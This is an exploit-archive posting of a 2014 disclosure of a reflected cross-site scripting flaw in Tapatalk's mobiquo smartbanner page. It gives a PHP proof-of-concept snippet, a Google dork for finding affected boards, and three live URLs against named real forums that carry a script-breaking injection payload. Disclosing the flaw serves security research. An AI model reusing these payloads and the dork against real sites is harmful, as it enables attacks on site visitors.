Tapatalk Forum Cross Site Scripting

Tapatalk Forum Cross Site Scripting: Posted Apr 27, 2014; Authored by E. Burtay Sahin; Tapatalk Forum suffers from a cross site scripting vulnerability.; tags | exploit, xss; SHA-256 | 253cd5c79575f7fb9259f5fda766b097a52ff591c1badea81b43b1012790918a; Download | Favorite | View

Tapatalk Forum Cross Site Scripting

##################################################################################
       __            _                      _            ____            
      / /___ _____  (_)_____________ ______(_)__  _____ / __ \_________ _
 __  / / __ `/ __ \/ / ___/ ___/ __ `/ ___/ / _ \/ ___// / / / ___/ __ `/
/ /_/ / /_/ / / / / (__  |__  ) /_/ / /  / /  __(__  )/ /_/ / /  / /_/ / 
\____/\__,_/_/ /_/_/____/____/\__,_/_/  /_/\___/____(_)____/_/   \__, /  
                                                                /____/   
Janissaries.Org                                
################################################################################## 

Exploit Title  : Tapatalk Universal Forum Application XSS Vulnerability (All Version)
Author      : E. Burtay Sahin
Author Mail    : admin@burtay.org 
Author Homepage : http://www.burtay.org
Community Hpage  : http://www.janissaries.org
Google Dork    : inurl:mobiquo
Vendor Homepage  : http://tapatalk.com/
Software Link  : http://tapatalk.com/activate_tapatalk.php
Version      : All Version

##################################################################################

P0C
$ads_url = $protocol.'tapatalk.com/welcome_screen.php'
    .'?referer='.urlencode($referer)
    .'&code='.urlencode($code)
    .'&board_url='.urlencode($board_url)
    .'&lang='.urlencode($lang)
    .$byo
    .'&callback=?';
<?php echo $ads_url; ?>

##################################################################################
3 Live Examples

1.)Version ip34_3.8.2
https://forums.plex.tv/mobiquo/smartbanner/welcome.php?referer=%22%3E%3C/script%3E%3Ch1%3EBurtay%20Can%20Execute%20H1%20tags%3C/h1%3E&code=401e11c4884d0fcf848a6b1a85c8945d&board_url=https%3A%2F%2Fforums.plex.tv&lang=tr

2.)Version vb3x_4.3.2
http://forum.xda-developers.com/mobiquo/smartbanner/welcome.php?referer=%22%3E%3C/script%3E%3Ch1%3EBurtay%20Can%20Execute%20H1%20tags%3C/h1%3E&code=401e11c4884d0fcf848a6b1a85c8945d&board_url=https%3A%2F%2Fforums.plex.tv&lang=tr

3.)Version pb30_4.4.0
http://www.passion-multirotor.fr/forum/mobiquo/smartbanner/welcome.php?referer=%22%3E%3C/script%3E%3Ch1%3EBurtay%20Can%20Execute%20H1%20tags%3C/h1%3E&code=401e11c4884d0fcf848a6b1a85c8945d&board_url=https%3A%2F%2Fforums.plex.tv&lang=tr

Top Authors In Last 30 Days

Red Hat 218 files
indoushka 135 files
Ubuntu 82 files
Gentoo 33 files
Debian 26 files
Jasper Nota 25 files
Willem Westerhof 19 files
Jim Blankendaal 11 files
Apple 9 files
Martijn Baalman 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,110)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,567)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,919)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,636)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,782)
UNIX (9,441)
UnixWare (187)
Windows (6,677)
Other

Tapatalk Forum Cross Site Scripting

Tapatalk Forum Cross Site Scripting

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Tapatalk Forum Cross Site Scripting

Share This

Tapatalk Forum Cross Site Scripting

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems